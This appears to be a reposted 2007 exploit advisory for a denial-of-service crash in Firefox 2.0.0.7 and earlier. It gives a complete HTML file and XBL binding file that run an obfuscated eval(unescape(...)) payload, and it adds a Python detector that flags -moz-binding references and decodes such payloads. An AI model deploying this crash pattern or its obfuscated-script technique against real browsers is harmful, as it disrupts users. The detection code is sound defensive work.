
Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit

October 23, 2007
######################### WwW.BugReport.ir #########################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
# Vendor URL: www.mozilla.org
# Version: <= 2.0.0.7
# Fix Available: Yes!
# Solution: Update to 2.0.0.8
# Note: This bug works on 2.0.0.8 in a different way. Although this bug doesn't crash 2.0.0.8, it causes the HTML code not to be shown when viewing the source in Mozilla Firefox 2.0.0.8, and this is another bug in 2.0.0.8!
# Proof: http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm
#
######################### WwW.AmnPardaz.com ########################
#
# Leaders : Shahin Ramezany & Sorush Dalili
# Team Members: Amir Hossein Khonakdar, Hamid Farhadi
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
# Country: Iran
# Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net
# Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com>
#
######################## Bug Description ###########################
#
# To do this we need 2 files (HTML, XML).
# Their code is written below.
#
# Save the code below in an HTML file.
#
--------------------------------------------------------------------
--------------------------------------------------------------------
<html>
<head>
<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
</head>
<body>
Suddenly see you baby!
If you see this bug execution was failed!
<script>
alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir')
</script>
</body>
</html>
--------------------------------------------------------------------
--------------------------------------------------------------------
#
# Save the code below in a "moz.xml" file.
#
--------------------------------------------------------------------
--------------------------------------------------------------------
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="xss">
<implementation>
<constructor><![CDATA[
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));
]]></constructor>
</implementation>
</binding>
</bindings>
--------------------------------------------------------------------
--------------------------------------------------------------------
#
# Now, by running the HTML file in Mozilla Firefox <= 2.0.0.7, it will crash, and in Mozilla Firefox 2.0.0.8 no code will be shown when viewing the source.
#
###################################################################

# milw0rm.com
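
A defensive check for the pattern used in the advisory above, as an added example that is not part of the original advisory: it flags `-moz-binding` references in markup (after undoing CSS comments and hex escapes) and decodes the `unescape()` literal inside an XBL constructor so an analyst can read what it runs. All function names and sample strings are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed samples that mirror the two files shown in the advisory above.
SAMPLE_HTML = ('<html><head><style>BODY{-moz-binding:url("moz.xml#xss")}</style>'
               '</head><body></body></html>')
SAMPLE_XBL = """<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation>
<constructor><![CDATA[
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));
]]></constructor></implementation></binding></bindings>"""

BINDING_RE = re.compile(r"-moz-binding\s*:\s*url\(\s*['\"]?([^'\")\s]+)", re.I)
CONSTRUCTOR_RE = re.compile(r"<constructor[^>]*>(.*?)</constructor>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)
CSS_ESCAPE_RE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?")


def _css_unescape(match):
    """Turn one CSS hex escape (e.g. '\\2d ') into its character."""
    cp = int(match.group(1), 16)
    return chr(cp) if cp <= 0x10FFFF else "\ufffd"


def normalize_css(text):
    """Strip CSS comments and decode hex escapes so an obfuscated name still matches."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)  # e.g. comments around the colon
    return CSS_ESCAPE_RE.sub(_css_unescape, text)      # e.g. \2d standing in for "-"


def find_bindings(markup):
    """Return every binding URL referenced through -moz-binding in the markup."""
    return BINDING_RE.findall(normalize_css(markup))


def decode_constructors(xbl):
    """Return XBL constructor bodies with unescape('...') literals decoded."""
    decoded = []
    for body in CONSTRUCTOR_RE.findall(xbl):
        body = re.sub(r"<!\[CDATA\[|\]\]>", "", body).strip()
        # JavaScript unescape() maps %XX to the Latin-1 code point XX.
        decoded.append(UNESCAPE_RE.sub(
            lambda m: repr(unquote(m.group(1), encoding="latin-1")), body))
    return decoded


if __name__ == "__main__":
    print(find_bindings(SAMPLE_HTML))
    print(decode_constructors(SAMPLE_XBL))
```
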

When reposting, please credit: woyigui's blog [http://www.woyigui.cn/]
Article title: Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit
Article URL: http://www.woyigui.cn/2007/10/23/mozillafirefoxlt%3B%3D2007remotedenialofserviceexploit/
